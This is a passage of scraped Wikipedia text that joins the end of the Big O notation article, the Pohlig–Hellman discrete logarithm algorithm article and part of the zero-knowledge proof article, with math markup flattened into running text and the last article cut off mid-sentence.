statements is as follows: foranyfunctions which satisfy eachO(·)on the left side, there aresomefunctions satisfying eachO(·)on the right side, such that substituting all these functions into the equation makes the two sides equal. For example, the third equation above means: "For any functionf(n) =O(1), there is some functiong(n) =O(en)such thatnf(n)=g(n)". In terms of the "set notation" above, the meaning is that the class of functions represented by the left side is a subset of the class of functions represented by the right side. In this use the "=" is a formal symbol that unlike the usual use of "=" is not asymmetric relation. Thus for examplenO(1)=O(en)does not imply the false statementO(en) =nO(1). Big O is typeset as an italicized uppercase "O", as in the following example:O(n2){\displaystyle O(n^{2})}.[12][13]InTeX, it is produced by simply typing 'O' inside math mode. Unlike Greek-named Bachmann–Landau notations, it needs no special symbol. However, some authors use the calligraphic variantO{\displaystyle {\mathcal {O}}}instead.[14][15] Here is a list of classes of functions that are commonly encountered when analyzing the running time of an algorithm. In each case,cis a positive constant andnincreases without bound. The slower-growing functions are generally listed first. The statementf(n)=O(n!){\displaystyle f(n)=O(n!)}is sometimes weakened tof(n)=O(nn){\displaystyle f(n)=O\left(n^{n}\right)}to derive simpler formulas for asymptotic complexity. For anyk>0{\displaystyle k>0}andc>0{\displaystyle c>0},O(nc(log⁡n)k){\displaystyle O(n^{c}(\log n)^{k})}is a subset ofO(nc+ε){\displaystyle O(n^{c+\varepsilon })}for anyε>0{\displaystyle \varepsilon >0},so may be considered as a polynomial with some bigger order. BigOis widely used in computer science. Together with some other related notations, it forms the family of Bachmann–Landau notations.[citation needed] Intuitively, the assertion "f(x)iso(g(x))" (read "f(x)is little-o ofg(x)" or "f(x)is of inferior order tog(x)") means thatg(x)grows much faster thanf(x), or equivalentlyf(x)grows much slower thang(x). As before, letfbe a real or complex valued function andga real valued function, both defined on some unbounded subset of the positivereal numbers, such thatg(x){\displaystyle g(x)}is strictly positive for all large enough values ofx. One writes if for every positive constantεthere exists a constantx0{\displaystyle x_{0}}such that For example, one has The difference between thedefinition of the big-O notationand the definition of little-o is that while the former has to be true forat least oneconstantM, the latter must hold foreverypositive constantε, however small.[18]In this way, little-o notation makes astronger statementthan the corresponding big-O notation: every function that is little-o ofgis also big-O ofg, but not every function that is big-O ofgis little-o ofg. For example,2x2=O(x2){\displaystyle 2x^{2}=O(x^{2})}but2x2≠o(x2){\displaystyle 2x^{2}\neq o(x^{2})}. Ifg(x){\displaystyle g(x)}is nonzero, or at least becomes nonzero beyond a certain point, the relationf(x)=o(g(x)){\displaystyle f(x)=o(g(x))}is equivalent to Little-o respects a number of arithmetic operations. For example, It also satisfies atransitivityrelation: Little-o can also be generalized to the finite case:[19] f(x)=o(g(x))asx→x0{\displaystyle f(x)=o(g(x))\quad {\text{ as }}x\to x_{0}}iff(x)=α(x)g(x){\displaystyle f(x)=\alpha (x)g(x)}for someα(x){\displaystyle \alpha (x)}withlimx→x0α(x)=0{\displaystyle \lim _{x\to x_{0}}\alpha (x)=0}. Or, ifg(x){\displaystyle g(x)}is nonzero in a neighbourhood aroundx0{\displaystyle x_{0}}: f(x)=o(g(x))asx→x0{\displaystyle f(x)=o(g(x))\quad {\text{ as }}x\to x_{0}}iflimx→x0f(x)g(x)=0{\displaystyle \lim _{x\to x_{0}}{\frac {f(x)}{g(x)}}=0}. This definition especially useful in the computation oflimitsusingTaylor series. For example: sin⁡x=x−x33!+…=x+o(x2)asx→0{\displaystyle \sin x=x-{\frac {x^{3}}{3!}}+\ldots =x+o(x^{2}){\text{ as }}x\to 0}, solimx→0sin⁡xx=limx→0x+o(x2)x=limx→01+o(x)=1{\displaystyle \lim _{x\to 0}{\frac {\sin x}{x}}=\lim _{x\to 0}{\frac {x+o(x^{2})}{x}}=\lim _{x\to 0}1+o(x)=1} Another asymptotic notation isΩ{\displaystyle \Omega }, read "big omega".[20]There are two widespread and incompatible definitions of the statement whereais some real number,∞{\displaystyle \infty }, or−∞{\displaystyle -\infty }, wherefandgare real functions defined in a neighbourhood ofa, and wheregis positive in this neighbourhood. The Hardy–Littlewood definition is used mainly inanalytic number theory, and the Knuth definition mainly incomputational complexity theory; the definitions are not equivalent. In 1914G.H. HardyandJ.E. Littlewoodintroduced the new symbolΩ,{\displaystyle \ \Omega \ ,}[21]which is defined as follows: Thusf(x)=Ω(g(x)){\displaystyle ~f(x)=\Omega {\bigl (}\ g(x)\ {\bigr )}~}is the negation off(x)=o(g(x)).{\displaystyle ~f(x)=o{\bigl (}\ g(x)\ {\bigr )}~.} In 1916 the same authors introduced the two new symbolsΩR{\displaystyle \ \Omega _{R}\ }andΩL,{\displaystyle \ \Omega _{L}\ ,}defined as:[22] These symbols were used byE. Landau, with the same meanings, in 1924.[23]Authors that followed Landau, however, use a different notation for the same definitions:[citation needed]The symbolΩR{\displaystyle \ \Omega _{R}\ }has been replaced by the current notationΩ+{\displaystyle \ \Omega _{+}\ }with the same definition, andΩL{\displaystyle \ \Omega _{L}\ }becameΩ−.{\displaystyle \ \Omega _{-}~.} These three symbolsΩ,Ω+,Ω−,{\displaystyle \ \Omega \ ,\Omega _{+}\ ,\Omega _{-}\ ,}as well asf(x)=Ω±(g(x)){\displaystyle \ f(x)=\Omega _{\pm }{\bigl (}\ g(x)\ {\bigr )}\ }(meaning thatf(x)=Ω+(g(x)){\displaystyle \ f(x)=\Omega _{+}{\bigl (}\ g(x)\ {\bigr )}\ }andf(x)=Ω−(g(x)){\displaystyle \ f(x)=\Omega _{-}{\bigl (}\ g(x)\ {\bigr )}\ }are both satisfied), are now currently used inanalytic number theory.[24][25] We have and more precisely We have and more precisely however In 1976Donald Knuthpublished a paper to justify his use of theΩ{\displaystyle \Omega }-symbol to describe a stronger property.[26]Knuth wrote: "For all the applications I have seen so far in computer science, a stronger requirement ... is much more appropriate". He defined with the comment: "Although I have changed Hardy and Littlewood's definition ofΩ{\displaystyle \Omega }, I feel justified in doing so because their definition is by no means in wide use, and because there are other ways to say what they want to say in the comparatively rare cases when their definition applies."[26] The limit definitions assumeg(n)>0{\displaystyle g(n)>0}for sufficiently largen{\displaystyle n}. The table is (partly) sorted from smallest to largest, in the sense thato,O,Θ,∼,{\displaystyle o,O,\Theta ,\sim ,}(Knuth's version of)Ω,ω{\displaystyle \Omega ,\omega }on functions correspond to<,≤,≈,=,{\displaystyle <,\leq ,\approx ,=,}≥,>{\displaystyle \geq ,>}on the real line[29](the Hardy–Littlewood version ofΩ{\displaystyle \Omega }, however, doesn't correspond to any such description). Computer science uses the bigO{\displaystyle O}, big ThetaΘ{\displaystyle \Theta }, littleo{\displaystyle o}, little omegaω{\displaystyle \omega }and Knuth's big OmegaΩ{\displaystyle \Omega }notations.[30]Analytic number theory often uses the bigO{\displaystyle O}, smallo{\displaystyle o}, Hardy's≍{\displaystyle \asymp },[31]Hardy–Littlewood's big OmegaΩ{\displaystyle \Omega }(with or without the +, − or ± subscripts) and∼{\displaystyle \sim }notations.[24]The small omegaω{\displaystyle \omega }notation is not used as often in analysis.[32] Informally, especially in computer science, the bigOnotation often can be used somewhat differently to describe an asymptotictightbound where using big Theta Θ notation might be more factually appropriate in a given context.[33]For example, when considering a functionT(n) = 73n3+ 22n2+ 58, all of the following are generally acceptable, but tighter bounds (such as numbers 2 and 3 below) are usually strongly preferred over looser bounds (such as number 1 below). The equivalent English statements are respectively: So while all three statements are true, progressively more information is contained in each. In some fields, however, the big O notation (number 2 in the lists above) would be used more commonly than the big Theta notation (items numbered 3 in the lists above). For example, ifT(n) represents the running time of a newly developed algorithm for input sizen, the inventors and users of the algorithm might be more inclined to put an upper asymptotic bound on how long it will take to run without making an explicit statement about the lower asymptotic bound. In their bookIntroduction to Algorithms,Cormen,Leiserson,RivestandSteinconsider the set of functionsfwhich satisfy In a correct notation this set can, for instance, be calledO(g), where O(g)={f:there exist positive constantscandn0such that0≤f(n)≤cg(n)for alln≥n0}.{\displaystyle O(g)=\{f:{\text{there exist positive constants}}~c~{\text{and}}~n_{0}~{\text{such that}}~0\leq f(n)\leq cg(n){\text{ for all }}n\geq n_{0}\}.}[34] The authors state that the use of equality operator (=) to denote set membership rather than the set membership operator (∈) is an abuse of notation, but that doing so has advantages.[6]Inside an equation or inequality, the use of asymptotic notation stands for an anonymous function in the setO(g), which eliminates lower-order terms, and helps to reduce inessential clutter in equations, for example:[35] Another notation sometimes used in computer science isÕ(readsoft-O), which hides polylogarithmic factors. There are two definitions in use: some authors usef(n) =Õ(g(n)) asshorthandforf(n) =O(g(n)logkn)for somek, while others use it as shorthand forf(n) =O(g(n) logkg(n)).[36]Wheng(n)is polynomial inn, there is no difference; however, the latter definition allows one to say, e.g. thatn2n=O~(2n){\displaystyle n2^{n}={\tilde {O}}(2^{n})}while the former definition allows forlogk⁡n=O~(1){\displaystyle \log ^{k}n={\tilde {O}}(1)}for any constantk. Some authors writeO*for the same purpose as the latter definition.[37]Essentially, it is bigOnotation, ignoringlogarithmic factorsbecause thegrowth-rateeffects of some other super-logarithmic function indicate a growth-rate explosion for large-sized input parameters that is more important to predicting bad run-time performance than the finer-point effects contributed by the logarithmic-growth factor(s). This notation is often used to obviate the "nitpicking" within growth-rates that are stated as too tightly bounded for the matters at hand (since logknis alwayso(nε) for any constantkand anyε> 0). Also, theLnotation, defined as is convenient for functions that are betweenpolynomialandexponentialin terms ofln⁡n{\displaystyle \ln n}. The generalization to functions taking values in anynormed vector spaceis straightforward (replacing absolute values by norms), wherefandgneed not take their values in the same space. A generalization to functionsgtaking values in anytopological groupis also possible[citation needed]. The "limiting process"x→xocan also be generalized by introducing an arbitraryfilter base, i.e. to directednetsfandg. Theonotation can be used to definederivativesanddifferentiabilityin quite general spaces, and also (asymptotical) equivalence of functions, which is anequivalence relationand a more restrictive notion than the relationship "fis Θ(g)" from above. (It reduces to limf/g= 1 iffandgare positive real valued functions.) For example, 2xis Θ(x), but2x−xis noto(x). The symbol O was first introduced by number theoristPaul Bachmannin 1894, in the second volume of his bookAnalytische Zahlentheorie("analytic number theory").[1]The number theoristEdmund Landauadopted it, and was thus inspired to introduce in 1909 the notation o;[2]hence both are now called Landau symbols. These notations were used in applied mathematics during the 1950s for asymptotic analysis.[38]The symbolΩ{\displaystyle \Omega }(in the sense "is not anoof") was introduced in 1914 by Hardy and Littlewood.[21]Hardy and Littlewood also introduced in 1916 the symbolsΩR{\displaystyle \Omega _{R}}("right") andΩL{\displaystyle \Omega _{L}}("left"),[22]precursors of the modern symbolsΩ+{\displaystyle \Omega _{+}}("is not smaller than a small o of") andΩ−{\displaystyle \Omega _{-}}("is not larger than a small o of"). Thus the Omega symbols (with their original meanings) are sometimes also referred to as "Landau symbols". This notationΩ{\displaystyle \Omega }became commonly used in number theory at least since the 1950s.[39] The symbol∼{\displaystyle \sim }, although it had been used before with different meanings,[29]was given its modern definition by Landau in 1909[40]and by Hardy in 1910.[41]Just above on the same page of his tract Hardy defined the symbol≍{\displaystyle \asymp }, wheref(x)≍g(x){\displaystyle f(x)\asymp g(x)}means that bothf(x)=O(g(x)){\displaystyle f(x)=O(g(x))}andg(x)=O(f(x)){\displaystyle g(x)=O(f(x))}are satisfied. The notation is still currently used in analytic number theory.[42][31]In his tract Hardy also proposed the symbol≍−{\displaystyle \mathbin {\,\asymp \;\;\;\;\!\!\!\!\!\!\!\!\!\!\!\!\!-} }, wheref≍−g{\displaystyle f\mathbin {\,\asymp \;\;\;\;\!\!\!\!\!\!\!\!\!\!\!\!\!-} g}means thatf∼Kg{\displaystyle f\sim Kg}for some constantK≠0{\displaystyle K\not =0}. In the 1970s the big O was popularized in computer science byDonald Knuth, who proposed the different notationf(x)=Θ(g(x)){\displaystyle f(x)=\Theta (g(x))}for Hardy'sf(x)≍g(x){\displaystyle f(x)\asymp g(x)}, and proposed a different definition for the Hardy and Littlewood Omega notation.[26] Two other symbols coined by Hardy were (in terms of the modernOnotation) (Hardy however never defined or used the notation≺≺{\displaystyle \prec \!\!\prec }, nor≪{\displaystyle \ll }, as it has been sometimes reported). Hardy introduced the symbols≼{\displaystyle \preccurlyeq }and≺{\displaystyle \prec }(as well as the already mentioned other symbols) in his 1910 tract "Orders of Infinity", and made use of them only in three papers (1910–1913). In his nearly 400 remaining papers and books he consistently used the Landau symbols O and o. Hardy's symbols≼{\displaystyle \preccurlyeq }and≺{\displaystyle \prec }(as well as≍−{\displaystyle \mathbin {\,\asymp \;\;\;\;\!\!\!\!\!\!\!\!\!\!\!\!\!-} }) are not used anymore. On the other hand, in the 1930s,[43]the Russian number theoristIvan Matveyevich Vinogradovintroduced his notation≪{\displaystyle \ll }, which has been increasingly used in number theory instead of theO{\displaystyle O}notation. We have and frequently both notations are used in the same paper. The big-O originally stands for "order of" ("Ordnung", Bachmann 1894), and is thus a Latin letter. Neither Bachmann nor Landau ever call it "Omicron". The symbol was much later on (1976) viewed by Knuth as a capitalomicron,[26]probably in reference to his definition of the symbolOmega. The digitzeroshould not be used.
https://en.wikipedia.org/wiki/Big_Theta_notation
Ingroup theory, thePohlig–Hellman algorithm, sometimes credited as theSilver–Pohlig–Hellman algorithm,[1]is a special-purposealgorithmfor computingdiscrete logarithmsin afinite abelian groupwhose order is asmooth integer. The algorithm was introduced by Roland Silver, but first published byStephen PohligandMartin Hellman, who credit Silver with its earlier independent but unpublished discovery. Pohlig and Hellman also list Richard Schroeppel and H. Block as having found the same algorithm, later than Silver, but again without publishing it.[2] As an important special case, which is used as a subroutine in the general algorithm (see below), the Pohlig–Hellman algorithm applies togroupswhose order is aprime power. The basic idea of this algorithm is to iteratively compute thep{\displaystyle p}-adic digits of the logarithm by repeatedly "shifting out" all but one unknown digit in the exponent, and computing that digit by elementary methods. (Note that for readability, the algorithm is stated for cyclic groups — in general,G{\displaystyle G}must be replaced by the subgroup⟨g⟩{\displaystyle \langle g\rangle }generated byg{\displaystyle g}, which is always cyclic.) The algorithm computes discrete logarithms in time complexityO(ep){\displaystyle O(e{\sqrt {p}})}, far better than thebaby-step giant-step algorithm'sO(pe){\displaystyle O({\sqrt {p^{e}}})}whene{\displaystyle e}is large. In this section, we present the general case of the Pohlig–Hellman algorithm. The core ingredients are the algorithm from the previous section (to compute a logarithm modulo each prime power in the group order) and theChinese remainder theorem(to combine these to a logarithm in the full group). (Again, we assume the group to be cyclic, with the understanding that a non-cyclic group must be replaced by the subgroup generated by the logarithm's base element.) The correctness of this algorithm can be verified via theclassification of finite abelian groups: Raisingg{\displaystyle g}andh{\displaystyle h}to the power ofn/piei{\displaystyle n/p_{i}^{e_{i}}}can be understood as the projection to the factor group of orderpiei{\displaystyle p_{i}^{e_{i}}}. The worst-case input for the Pohlig–Hellman algorithm is a group of prime order: In that case, it degrades to thebaby-step giant-step algorithm, hence the worst-case time complexity isO(n){\displaystyle {\mathcal {O}}({\sqrt {n}})}. However, it is much more efficient if the order is smooth: Specifically, if∏ipiei{\displaystyle \prod _{i}p_{i}^{e_{i}}}is the prime factorization ofn{\displaystyle n}, then the algorithm's complexity isO(∑iei(log⁡n+pi)){\displaystyle {\mathcal {O}}\left(\sum _{i}{e_{i}(\log n+{\sqrt {p_{i}}})}\right)}group operations.[3]
https://en.wikipedia.org/wiki/Pohlig–Hellman_algorithm
Incryptography, azero-knowledge proof(also known as aZK prooforZKP) is a protocol in which one party (the prover) can convince another party (the verifier) that some given statement is true, without conveying to the verifier any informationbeyondthe mere fact of that statement's truth.[1]The intuition underlying zero-knowledge proofs is that it is trivial to prove possession of the relevant information simply by revealing it; the hard part is to prove this possession without revealing this information (or any aspect of it whatsoever).[2] In light of the fact that one should be able to generate a proof of some statementonlywhen in possession of certain secret information connected to the statement, the verifier, even after having become convinced of the statement's truth, should nonetheless remain unable to prove the statement to further third parties. Zero-knowledge proofs can be interactive, meaning that the prover and verifier exchange messages according to some protocol, or noninteractive, meaning that the verifier is convinced by a single prover message and no other communication is needed. In thestandard model, interaction is required, except for trivial proofs ofBPPproblems.[3]In thecommon random stringandrandom oraclemodels,non-interactive zero-knowledge proofsexist. TheFiat–Shamir heuristiccan be used to transform certain interactive zero-knowledge proofs into noninteractive ones.[4][5][6] There is a well-known story presenting the fundamental ideas of zero-knowledge proofs, first published in 1990 byJean-Jacques Quisquaterand others in their paper "How to Explain Zero-Knowledge Protocols to Your Children".[7]The two parties in the zero-knowledge proof story arePeggyas the prover of the statement, andVictor, the verifier of the statement. In this story, Peggy has uncovered the secret word used to open a magic door in a cave. The cave is shaped like a ring, with the entrance on one side and the magic door blocking the opposite side. Victor wants to know whether Peggy knows the secret word; but Peggy, being a very private person, does not want to reveal her knowledge (the secret word) to Victor or to reveal the fact of her knowledge to the world in general. They label the left and right paths from the entrance A and B. First, Victor waits outside the cave as Peggy goes in. Peggy takes either path A or B; Victor is not allowed to see which path she takes. Then, Victor enters the cave and shouts the name of the path he wants her to use to return, either A or B, chosen at random. Providing she really does know the magic word, this is easy: she opens the door, if necessary, and returns along the desired path. However, suppose she did not know the word. Then, she would only be able to return by the named path if Victor were to give the name of the same path by which she had entered. Since Victor would choose A or B at random, she would have a 50% chance of guessing correctly. If they were to repeat this trick many times, say 20 times in a row, her chance of successfully anticipating all of Victor's requests would be reduced to 1 in 220, or 9.54×10−7. Thus, if Peggy repeatedly appears at the exit Victor names, then he can conclude that it is extremely probable that Peggy does, in fact, know the secret word. One side note with respect to third-party observers: even if Victor is wearing a hidden camera that records the whole transaction, the only thing the camera will record is in one case Victor shouting "A!" and Peggy appearing at A or in the other case Victor shouting "B!" and Peggy appearing at B. A recording of this type would be trivial for any two people to fake (requiring only that Peggy and Victor agree beforehand on the sequence of As and Bs that Victor will shout). Such a recording will certainly never be convincing to anyone but the original participants. In fact, even a person who was present as an observer at the original experiment should be unconvinced, since Victor and Peggy could have orchestrated the whole "experiment" from start to finish. Further, if Victor chooses his As and Bs by flipping a coin on-camera, this protocol loses its zero-knowledge property; the on-camera coin flip would probably be convincing to any person watching the recording later. Thus, although this does not reveal the secret word to Victor, it does make it possible for Victor to convince the world in general that Peggy has that knowledge—counter to Peggy's stated wishes. However, digital cryptography generally "flips coins" by relying on apseudo-random number generator, which is akin to a coin with a fixed pattern of heads and tails known only to the coin's owner. If Victor's coin behaved this way, then again it would be possible for Victor and Peggy to have faked the experiment, so using a pseudo-random number generator would not reveal Peggy's knowledge to the world in the same way that using a flipped coin would. Peggy could prove to Victor that she knows the magic word, without revealing it to him, in a single trial. If both Victor and Peggy go together to the mouth of the cave, Victor can watch Peggy go in through A and come out through B. This would prove with certainty that Peggy knows the magic word, without revealing the magic word to Victor. However, such a proof could be observed by a third party, or recorded by Victor and such a proof would be convincing to anybody. In other words, Peggy could not refute such proof by claiming she colluded with Victor, and she is therefore no longer in control of who is aware of her knowledge. Imagine your friend "Victor" is red-greencolour-blind(while you are not) and you have two balls: one red and one green, but otherwise identical. To Victor, the balls seem completely identical. Victor is skeptical that the balls are actually distinguishable. You want toprove to Victor that the balls are in fact differently coloured, but nothing else. In particular, you do not want to reveal which ball is the red one and which is the green. Here is the proof system: You give the two balls to Victor and he puts them behind his back. Next, he takes one of the balls and brings it out from behind his back and displays it. He then places it behind his back again and then chooses to reveal just one of the two balls, picking one of the two at random with equal probability. He will ask you, "Did I switch the ball?" This whole procedure is then repeated as often as necessary. By looking at the balls' colours, you can, of course, say with certainty whether or not he switched them. On the other hand, if the balls were the same colour and hence indistinguishable, your ability to determine whether a switch occurred would be no better than random guessing. Since the probability that you would have randomly succeeded at identifying each switch/non-switch is 50%, the probability of having randomly succeeded atallswitch/non-switches approaches zero. Over multiple trials, the success rate wouldstatistically convergeto 50%, and you could not achieve a performance significantly better than chance. If you and your friend repeat this "proof" multiple times (e.g. 20 times), your friend should become convinced that the balls are indeed differently coloured. The above proof iszero-knowledgebecause your friend never learns which ball is green and which is red; indeed, he gains no knowledge about how to distinguish the balls.[8] One well-known example of a zero-knowledge proof is the "Where's Wally" example. In this example, the prover wants to prove to the verifier that they know where Wally is on a page in aWhere's Wally?book, without revealing his location to the verifier.[9] The prover starts by taking a large black board with a small hole in it, the size of Wally. The board is twice the size of the book in both directions, so the verifier cannot see where on the page the prover is placing it. The prover then places the board over the page so that Wally is in the hole.[9] The verifier can now look through the hole and see Wally, but cannot see any other part of the page. Therefore, the prover has proven to the verifier that they know where Wally is, without revealing any other information about his location.[9] This example is not a perfect zero-knowledge proof, because the prover does reveal some information about Wally's location, such as his body position. However, it is a decent illustration of the basic concept of a zero-knowledge proof. A zero-knowledge proof of some statement must satisfy three properties: The first two of these are properties of more generalinteractive proof systems. The third is what makes the proof zero-knowledge.[10] Zero-knowledge proofs are not proofs in the mathematical sense of the term because there is some small probability, thesoundness error, that a cheating prover will be able to convince the verifier of a false statement. In other words, zero-knowledge proofs are probabilistic "proofs" rather than deterministic proofs. However, there are techniques to decrease the soundness error to negligibly small values (for example, guessing correctly on a hundred or thousand binary decisions has a 1/2100or 1/21000soundness error, respectively. As the number of bits increases, the soundness error decreases toward zero). A formal definition of zero-knowledge must use some computational model, the most common one being that of aTuring machine. LetP,V, andSbe Turing machines. Aninteractive proof systemwith(P,V)for a languageLis zero-knowledge if for anyprobabilistic polynomial time(PPT) verifierV^{\displaystyle {\hat {V}}}there exists a PPT simulatorSsuch that: whereViewV^{\displaystyle {\hat {V}}}[P(x)↔V^{\displaystyle {\hat {V}}}(x,z)]is a record of the interactions betweenP(x)andV(x,z). The proverPis modeled as having unlimited computation power (in practice,Pusually is aprobabilistic Turing machine). Intuitively, the definition states that an interactive proof system(P,V)is zero-knowledge if for any verifierV^{\displaystyle {\hat {V}}}there exists an efficient simulatorS(depending onV^{\displaystyle {\hat {V}}}) that can reproduce the conversation betweenPandV^{\displaystyle {\hat {V}}}on any given input. The auxiliary stringzin the definition plays the role of "prior knowledge" (including the random coins ofV^{\displaystyle {\hat {V}}}). The definition implies thatV^{\displaystyle {\hat {V}}}cannot use any prior knowledge stringzto mine information out of its conversation withP, because ifSis also given this prior knowledge then it can reproduce the conversation betweenV^{\displaystyle {\hat {V}}}andPjust as before.[citation needed] The definition given is that of perfect zero-knowledge. Computational zero-knowledge is obtained by requiring that the views of the verifierV^{\displaystyle {\hat {V}}}and the simulator are onlycomputationally indistinguishable, given the auxiliary string.[citation needed] These ideas can be applied to a more realistic cryptography application. Peggy wants to prove to Victor that she knows thediscrete logarithmof a given value in a givengroup.[11] For example, given a valuey, a largeprimep, and a generatorg{\displaystyle g}, she wants to prove that she knows a valuexsuch thatgx≡y(modp), without revealingx. Indeed, knowledge ofxcould be used as a proof of identity, in that Peggy could have such knowledge because she chose a random valuexthat she did not reveal to anyone, computedy=gxmodp, and distributed the value ofyto all potential verifiers, such that at a later time, proving knowledge ofxis equivalent to proving identity as Peggy. The protocol proceeds as follows: in each round, Peggy generates a random numberr, computesC=grmodpand discloses this to Victor. After receivingC, Victor randomly issues one of the following two requests: he either requests that Peggy discloses the value ofr, or the value of(x+r) mod (p− 1). Victor can verify either answer; if he requestedr, he can then computegrmodpand verify that it matchesC. If he requested(x+r) mod (p− 1), then he can verify thatCis consistent with this, by computingg(x+r) mod (p− 1)modpand verifying that it matches(C·y) modp. If Peggy indeed knows the value ofx, then she can respond to either one of Victor's possible challenges. If Peggy knew or could guess which challenge Victor is going to issue, then she could easily cheat and convince Victor that she knowsxwhen she does not: if she knows that Victor is going to requestr, then she proceeds normally: she picksr, computesC=grmodp, and disclosesCto Victor; she will be able to respond to Victor's challenge. On the other hand, if she knows that Victor will request(x+r) mod (p− 1), then she picks a random valuer′, computesC′ ≡gr′· (gx)−1modp, and disclosesC′to Victor as the value ofCthat he is expecting. When Victor challenges her to reveal(x+r) mod (p− 1), she revealsr′, for which Victor will verify consistency, since he will in turn computegr′modp, which matchesC′ ·y, since Peggy multiplied by themodular multiplicative inverseofy. However, if in either one of the above scenarios Victor issues a challenge other than the one she was expecting and for which she manufactured the result, then she will be unable to respond to the challenge under the assumption of infeasibility of solving the discrete log for this group. If she pickedrand disclosedC=grmodp, then she will be unable to produce a valid(x+r) mod (p− 1)that would pass Victor's verification, given that she does not knowx. And if she picked a valuer′that poses as(x+r) mod (p− 1), then she would have to respond with the discrete log of the value that she disclosed – but Peggy does not know this discrete log, since the valueCshe disclosed was obtained through arithmetic with known values, and not by computing a power with a known exponent. Thus, a cheating prover has a 0.5 probability of successfully cheating in one round. By executing a large-enough number of rounds, the probability of a cheating prover succeeding can be made arbitrarily low. To show that the above interactive proof gives zero knowledge other than the fact that Peggy knowsx, one can use similar arguments as used in the above proof of completeness and soundness. Specifically, a simulator, say Simon, who does not knowx, can simulate the exchange between Peggy and Victor by the following procedure. Firstly, Simon randomly flips a fair coin. If the result is "heads", then he picks a random valuer, computesC=grmodp, and disclosesCas if it is a message from Peggy to Victor. Then Simon also outputs a message "request the value ofr" as if it is sent from Victor to Peggy, and immediately outputs the value ofras if it is sent from Peggy to Victor. A single round is complete. On the other hand, if the coin flipping result is "tails", then Simon picks a random numberr′, computesC′ =gr′·y−1modp, and disclosesC′as if it is a message from Peggy to Victor. Then Simon outputs "request the value of(x+r) mod (p− 1)" as if it is a message from Victor to Peggy. Finally, Simon outputs the value ofr′as if it is the response from Peggy back to Victor. A single round is complete. By the previous arguments when proving the completeness and soundness, the interactive communication simulated by Simon is indistinguishable from the true correspondence between Peggy and Victor. The zero-knowledge property is thus guaranteed. The following scheme is due toManuel Blum.[12] In this scenario, Peggy knows aHamiltonian cyclefor a largegraphG. Victor knowsGbut not the cycle (e.g., Peggy has generatedGand revealed it to him.) Finding a Hamiltonian cycle given a large graph is believed to be computationally infeasible, since its corresponding decision version is known to beNP-complete. Peggy will prove that she knows the cycle without simply revealing it (perhaps Victor is interested in buying it but wants verification first, or maybe Peggy is the only one who knows this information and is proving her identity to Victor). To show that Peggy knows this Hamiltonian cycle, she and Victor play several rounds of a game: It is important that the commitment to the graph be such that Victor can verify, in the second case, that the cycle is really made of edges fromH. This can be done by, for example, committing to every edge (or lack thereof) separately. If Peggy does know a Hamiltonian cycle inG, then she can easily satisfy Victor's demand for either the graph isomorphism producingHfromG(which she had committed to in the first step) or a Hamiltonian cycle inH(which she can construct by applying the isomorphism to the cycle inG). Peggy's answers do not reveal the original Hamiltonian cycle inG. In each round, Victor will learn onlyH's isomorphism toGor a Hamiltonian cycle inH. He would need both answers for a singleHto discover the cycle inG, so the information remains unknown as long as Peggy can generate a distinctHevery round. If Peggy does not know of a Hamiltonian cycle inG, but somehow knew in advance what Victor would ask to see each round, then she could cheat. For example, if Peggy knew ahead of time that Victor would ask to see the Hamiltonian cycle inH, then she could generate a Hamiltonian cycle for an unrelated graph. Similarly, if Peggy knew in advance that Victor would ask to see the isomorphism then she could simply generate an isomorphic graphH(in which she also does not know a Hamiltonian cycle). Victor could simulate the protocol by himself (without Peggy) because he knows what he will ask to see. Therefore, Victor gains no information about the Hamiltonian cycle inGfrom the information revealed in each round. If Peggy does not know the information, then she can guess which question Victor will ask and generate either a graph isomorphic toGor a Hamiltonian cycle for an unrelated graph, but since she does not know a Hamiltonian cycle forG, she cannot do both. With this guesswork, her chance of fooling Victor is2−n, wherenis the number of rounds. For all realistic purposes, it is infeasibly difficult to defeat a zero-knowledge proof with a reasonable number of rounds in this way. Different variants of zero-knowledge can be defined by formalizing the intuitive concept of what is meant by the output of the simulator "looking like" the execution of the real proof protocol in the following ways: There are various types of zero-knowledge proofs: Zero-knowledge proof schemes can be constructed from various cryptographic primitives, such ashash-based cryptography,pairing-based cryptography,multi-party computation, orlattice-based cryptography. Research in zero-knowledge proofs has been motivated byauthenticationsystems where one party wants to prove its identity to a second party via some secret information (such as a password) but does not want the second party to learn anything about this secret. This is called a "zero-knowledgeproof of knowledge". However, a password is typically too small or insufficiently random to be used in many schemes for zero-knowledge proofs of knowledge. Azero-knowledge password proofis a special kind of zero-knowledge proof of knowledge that addresses the limited size of passwords.[citation needed] In April 2015, the one-out-of-many proofs protocol (aSigma protocol) was introduced.[14]In August 2021,Cloudflare, an American web infrastructure and security company, decided to use the one-out-of-many proofs mechanism for private web verification using vendor hardware.[15] One of the uses of zero-knowledge proofs within cryptographic protocols is to enforce honest behavior while maintaining privacy. Roughly, the idea is to force a user to prove, using a zero-knowledge proof, that its behavior is correct according to the protocol.[16][17]Because of soundness, we know that the user must really act honestly in order to be able to provide a valid proof. Because of zero knowledge, we know that the user does not compromise the privacy of its secrets in the process of providing the proof.[citation needed] In 2016, thePrinceton Plasma Physics LaboratoryandPrinceton Universitydemonstrated a technique that may have applicability to futurenuclear disarmamenttalks. It would allow inspectors to confirm whether or not an object is indeed a nuclear weapon without recording, sharing, or revealing the internal workings, which might be secret.[18] Zero-knowledge proofs were applied in theZerocoinand Zerocash protocols, which culminated in the birth ofZcoin[19](later rebranded asFiroin 2020)[20]andZcashcryptocurrencies in 2016. Zerocoin has a built-in mixing model that does not trust any peers or centralised mixing providers to ensure anonymity.[19]Users can transact in a base currency and can cycle the currency into and out of Zerocoins.[21]The Zerocash protocol uses a similar model (a variant known as anon-interactive zero-knowledge proof)[22]except that it can obscure the transaction amount, while Zerocoin cannot. Given significant restrictions of transaction data on the Zerocash network, Zerocash is less prone to privacy timing attacks when compared to Zerocoin. However, this additional layer of privacy can cause potentially undetected hyperinflation of Zerocash supply because fraudulent coins cannot be tracked.[19][23] In 2018, Bulletproofs were introduced. Bulletproofs are an improvement from non-interactive zero-knowledge proofs where a trusted setup is not needed.[24]It was later implemented into theMimblewimbleprotocol (which the Grin and Beam cryptocurrencies are based upon) andMonero cryptocurrency.[25]In 2019, Firo implemented the Sigma protocol, which is an improvement on the Zerocoin protocol without trusted setup.[26][14]In the same year, Firo introduced the Lelantus protocol, an improvement on the Sigma protocol, where the former hides the origin and amount of a transaction.[27] Zero-knowledge proofs by their nature can enhance privacy in identity-sharing systems, which are vulnerable to data breaches and identity theft. When integrated to adecentralized identifiersystem, ZKPs add an extra layer of encryption on DID documents.[28] Zero-knowledge proofs were first conceived 